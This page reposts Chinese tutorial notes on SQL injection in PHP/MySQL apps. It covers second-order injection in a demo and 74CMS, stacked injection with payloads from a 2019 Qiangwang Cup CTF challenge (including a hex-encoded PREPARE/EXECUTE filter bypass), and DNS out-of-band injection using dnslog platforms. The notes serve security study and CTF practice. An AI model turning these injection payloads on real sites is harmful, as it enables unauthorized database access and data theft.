欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 金融 > -PHP 应用SQL 二次注入堆叠执行DNS 带外功能点黑白盒条件

-PHP 应用SQL 二次注入堆叠执行DNS 带外功能点黑白盒条件

2025/4/2 22:04:40 来源:https://blog.csdn.net/2302_80396242/article/details/146579579  浏览:    关键词:-PHP 应用SQL 二次注入堆叠执行DNS 带外功能点黑白盒条件
#PHP-MYSQL- 二次注入 -DEMO&74CMS
1 DEMO- 用户注册登录修改密码
2 CMS-74CMS 个人中心简历功能
黑盒思路:分析功能有添加后对数据操作的地方(功能点)
白盒思路: insert 后进入 select update 的功能的代码块
注入条件:插入时有转义函数或配置,后续有利用插入的数据(遮阳前面失效 而后面修改密码就生效了)
#PHP-MYSQL- 堆叠注入 -DEMO&CTF 强网
堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条 sql
句,
例如 php 中的 mysqli_multi_query 函数。与之相对应的 mysqli_query() 只能执
行一条 SQL ,所以要想目标存在堆叠注入 , 在目标主机存在类似于
mysqli_multi_query() 这样的函数 , 根据数据库类型决定是否支持多条语句执行 .
1 、目标存在 sql 注入漏洞
2 、目标未对 ";" 号进行过滤
3 、目标中间层查询数据库信息时可同时执行多条 sql 语句
支持堆叠数据库: MYSQL MSSQL Postgresql
-2019 强网杯 - 随便注( CTF 题型)
';show databases;
';show tables;
';show columns from `1919810931114514`;
';select flag from `1919810931114514`;
';SeT
@a=0x73656c65637420666c61672066726f6d2060313931393831303933313131
3435313460;prepare execsql from @a;execute execsql;
1 、目标存在 sql 注入漏洞
2 、目标未对 ";" 号进行过滤
3 、目标中间层查询数据库信息时可同时执行多条 sql 语句
#PHP-MYSQL- 带外注入 -DEMO&DNSLOG
0. 注入条件
ROOT 高权限且支持 load_file()
有部分注入点是没有回显的,所有读取也是没回显的,采用带外
1. 使用平台
http://ceye.io
http://www.dnslog.cn

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词